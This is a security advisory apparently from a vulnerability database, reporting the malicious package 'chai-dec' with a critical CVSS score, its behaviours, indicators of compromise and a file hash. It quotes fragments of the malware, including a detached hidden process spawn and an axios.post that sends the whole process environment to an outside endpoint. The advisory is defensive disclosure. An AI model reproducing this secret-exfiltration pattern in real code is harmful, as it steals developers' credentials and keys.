VDB
GCVE-110-OSM-2026-5393
GCVE-110-OSM-2026-5393
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code.
Entrypoint: index.js (main: index.js)
Payload: lib/initializeCaller.js
Secondary files: [deobfuscated] lib/initializeCaller.js
Key findings:
- Stealth Background Process Spawning in index.js: "spawn('node', [scriptPath, JSON.stringify(args)], {
detached: true,
stdi..."
- Environment Variable Exfiltration in lib/initializeCaller.js: "process.env.DEV_SECRET_KEY);
const apiHeaderValue = atob(process.env.DEV_SECRE..."
- Global Variable Shadowing in lib/initializeCaller.js: "const process = {"
- Base64 Decoded Environment Variable in lib/initializeCaller.js: "atob(process.env."
- Fetch and Eval/Exec in lib/initializeCaller.js: "axios.post(
apiEndpoint,
{ ...process.env },
{ headers: ..."
IOCs:
- urls: http://192.168.1.42:9200, https://purple-kelila-79.tiiny.site/data.json, https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df
- domains: purple-kelila-79.tiiny.site, ipcheck-hashed.vercel.app
- payloadFileHash: fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad
Decoded/deobfuscated IOCs:
- urls: https://purple-kelila-79.tiiny.site/data.json, https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df
- domains: purple-kelila-79.tiiny.site, ipcheck-hashed.vercel.app
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | chai-dec | all (affected) | — |
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.